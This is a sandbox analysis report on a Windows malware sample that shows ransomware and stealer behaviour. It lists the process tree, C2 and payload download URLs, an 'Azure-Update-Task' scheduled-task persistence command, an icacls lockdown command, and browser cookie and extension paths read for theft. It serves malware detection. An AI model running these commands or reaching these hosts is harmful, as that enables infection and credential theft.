Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 21, 2023, 5:57 p.m.	April 21, 2023, 5:59 p.m.

Size	731.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`2649cbcef1838339d91cd7ff59ef3208`
SHA256	`90c47829618b19477a16b38958940a62f9bd15378af79cf8d901d500e7bf873f`
CRC32	`D0557DCD`
ssdeep	`12288:Jx8cIUH99BUG06tM3Q90x9megGZvT56syEMsc8QSVFgl51p:JvBrpM3Q9sTgyIE09xlz`
PDB Path	C:\gogotenanehah\wihujuhitawa\fusoparibelo\buwu56_fihacaduze\yogum.pdb
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library

buildz.exe "C:\Users\test22\AppData\Local\Temp\buildz.exe"
2052
- buildz.exe "C:\Users\test22\AppData\Local\Temp\buildz.exe"
  2132
  - icacls.exe icacls "C:\Users\test22\AppData\Local\229c02e7-7584-4177-8796-fc34841171d9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    2276
  - buildz.exe "C:\Users\test22\AppData\Local\Temp\buildz.exe" --Admin IsNotAutoStart IsNotTask
    2336
    - buildz.exe "C:\Users\test22\AppData\Local\Temp\buildz.exe" --Admin IsNotAutoStart IsNotTask
      2416
      - build2.exe "C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe"
        2828
        
        build2.exe "C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe"
        2932
      - build3.exe "C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build3.exe"
        3004
        
        schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
        3052

Name	Response	Post-Analysis Lookup
api.2ip.ua	A 162.0.217.254	162.0.217.254
t.me	A 149.154.167.99	149.154.167.99
steamcommunity.com	A 184.26.243.205	23.198.103.114
zexeq.com	A 109.98.58.98 A 190.219.89.165 A 222.236.49.123 A 211.171.233.126 A 211.53.230.67 A 190.229.19.7 A 222.236.49.124 A 58.235.189.192 A 190.140.140.75 A 95.158.162.200	95.158.162.200
colisumy.com	A 175.126.109.15 A 211.40.39.251 A 222.236.49.123 A 211.59.14.90 A 211.53.230.67 A 211.119.84.111 A 95.158.162.200 A 37.34.248.24 A 189.245.154.150 A 84.224.34.240	175.126.109.15

IP Address	Status	Action
116.203.7.73	Active	Moloch
149.154.167.99	Active	Moloch
162.0.217.254	Active	Moloch
164.124.101.2	Active	Moloch
184.26.243.205	Active	Moloch
95.158.162.200	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:50800 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
TCP 162.0.217.254:443 -> 192.168.56.103:49166	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49174 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49174 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 162.0.217.254:443 -> 192.168.56.103:49175	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49187 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49187 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49187 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49190 -> 184.26.243.205:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 149.154.167.99:443 -> 192.168.56.103:49188	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 95.158.162.200:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49177 -> 95.158.162.200:80	2036334	ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key	A Network Trojan was detected
TCP 95.158.162.200:80 -> 192.168.56.103:49177	2036335	ET MALWARE Win32/Filecoder.STOP Variant Public Key Download	A Network Trojan was detected
TCP 192.168.56.103:49186 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49186 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49178 -> 95.158.162.200:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 95.158.162.200:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 95.158.162.200:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 95.158.162.200:80 -> 192.168.56.103:49178	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49191 -> 116.203.7.73:80	2027262	ET INFO Dotted Quad Host ZIP Request	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 95.158.162.200:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49179 -> 95.158.162.200:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 95.158.162.200:80 -> 192.168.56.103:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49165 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49186 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49173 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49187 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49164 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49190 184.26.243.205:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5

Queries for the computername (11 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2023, 5:57 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 21, 2023, 5:57 p.m.			0	0
IsDebuggerPresent April 21, 2023, 5:57 p.m.			0	0
IsDebuggerPresent April 21, 2023, 5:57 p.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 21, 2023, 5:57 p.m.	buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

C:\gogotenanehah\wihujuhitawa\fusoparibelo\buwu56_fihacaduze\yogum.pdb

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 21, 2023, 5:57 p.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (4 events)

resource name	AFX_DIALOG_LAYOUT
resource name	FULOWATALE
resource name	PAWEREYUHIBUXOPENINOSEWEGIYAJUM
resource name	ZUCITEFIPUPUFOLEY

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 21, 2023, 5:57 p.m.	stacktrace: RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x7796f559 RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x7796f639 RtlpNtEnumerateSubKey+0x2d74 isupper-0x4ae2 ntdll+0xcf8a2 @ 0x7796f8a2 RtlUlonglongByteSwap+0xdacb RtlFreeOemString-0x13e0f ntdll+0x8aebb @ 0x7792aebb RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cce @ 0x778d3cce build2+0x29bb4 @ 0x429bb4 build2+0x2a6d0 @ 0x42a6d0 build2+0x501f @ 0x40501f build2+0x572d @ 0x40572d build2+0xb2e3 @ 0x40b2e3 build2+0x1413b @ 0x41413b build2+0xd0f9 @ 0x40d0f9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653 exception.instruction: jmp 0x7796e667 exception.module: ntdll.dll exception.exception_code: 0xc0000374 exception.offset: 845395 exception.address: 0x7796e653 registers.esp: 264809924 registers.edi: 32517200 registers.eax: 264809940 registers.ebp: 264810044 registers.edx: 0 registers.ebx: 0 registers.esi: 32505856 registers.ecx: 2147483647	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

April 21, 2023, 5:57 p.m.

stacktrace:

RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x7796f559
RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x7796f639
RtlpNtEnumerateSubKey+0x2d74 isupper-0x4ae2 ntdll+0xcf8a2 @ 0x7796f8a2
RtlUlonglongByteSwap+0xdacb RtlFreeOemString-0x13e0f ntdll+0x8aebb @ 0x7792aebb
RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cce @ 0x778d3cce
build2+0x29bb4 @ 0x429bb4
build2+0x2a6d0 @ 0x42a6d0
build2+0x501f @ 0x40501f
build2+0x572d @ 0x40572d
build2+0xb2e3 @ 0x40b2e3
build2+0x1413b @ 0x41413b
build2+0xd0f9 @ 0x40d0f9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff
exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653
exception.instruction: jmp 0x7796e667
exception.module: ntdll.dll
exception.exception_code: 0xc0000374
exception.offset: 845395
exception.address: 0x7796e653
registers.esp: 264809924
registers.edi: 32517200
registers.eax: 264809940
registers.ebp: 264810044
registers.edx: 0
registers.ebx: 0
registers.esi: 32505856
registers.ecx: 2147483647

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://116.203.7.73/
suspicious_features	Connection to IP address				suspicious_request	GET http://116.203.7.73/install.zip

Performs some HTTP requests (6 events)

request	GET http://zexeq.com/raud/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
request	GET http://colisumy.com/dl/build2.exe
request	GET http://zexeq.com/files/1/build3.exe
request	GET http://116.203.7.73/
request	GET http://116.203.7.73/install.zip
request	GET https://steamcommunity.com/profiles/76561199497218285

Allocates read-write-execute memory (usually to unpack itself) (7 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2052 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 598016 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02dd0000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2052 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2336 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 598016 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ee0000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2336 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03140000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 204800 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ce000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2828 region_size: 356352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2023, 5:57 p.m.	process_identifier: 2932 region_size: 995328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x61e00000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (50 out of 4754 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2391.0\_platform_specific\win_x64\widevinecdm.dll.sig\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\4\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\th\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\iw\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\it\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Local Extension Settings\fmhmiaejopepamlcjkncpgpdjichnecm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\fmhmiaejopepamlcjkncpgpdjichnecm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\lo\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\03019df3fd85a69a8ebd1facc6da9ba73e469774fe77f579fc5a08b8328c1d6b.sth\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\52\manifest.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\ka\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\tr\Network\Cookies

Creates executable files on the filesystem (8 events)

file	C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build3.exe
file	C:\ProgramData\vcruntime140.dll
file	C:\ProgramData\msvcp140.dll
file	C:\ProgramData\nss3.dll
file	C:\ProgramData\freebl3.dll
file	C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe
file	C:\ProgramData\mozglue.dll
file	C:\ProgramData\softokn3.dll

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe
file	C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build3.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build3.exe
file	C:\Users\test22\AppData\Local\a502e6cc-2419-4214-a4d2-d5c406a0a7f5\build2.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 21, 2023, 5:57 p.m.	thread_identifier: 3056 thread_handle: 0x000000ac process_identifier: 3052 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (41 events)

Time & API	Arguments	Status	Return
Process32FirstW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: [System Process] process_identifier: 0	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: System process_identifier: 4	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: smss.exe process_identifier: 232	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: csrss.exe process_identifier: 308	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: wininit.exe process_identifier: 344	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: csrss.exe process_identifier: 356	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: winlogon.exe process_identifier: 392	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: services.exe process_identifier: 436	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: lsass.exe process_identifier: 452	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: lsm.exe process_identifier: 460	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 560	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 636	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 716	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 780	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 824	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: audiodg.exe process_identifier: 896	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 984	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: svchost.exe process_identifier: 340	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: spoolsv.exe process_identifier: 1060	1	1
Process32NextW April 21, 2023, 5:57 p.m.	snapshot_handle: 0x00000578 process_name: taskhost.exe process_identifier: 1112	1	1
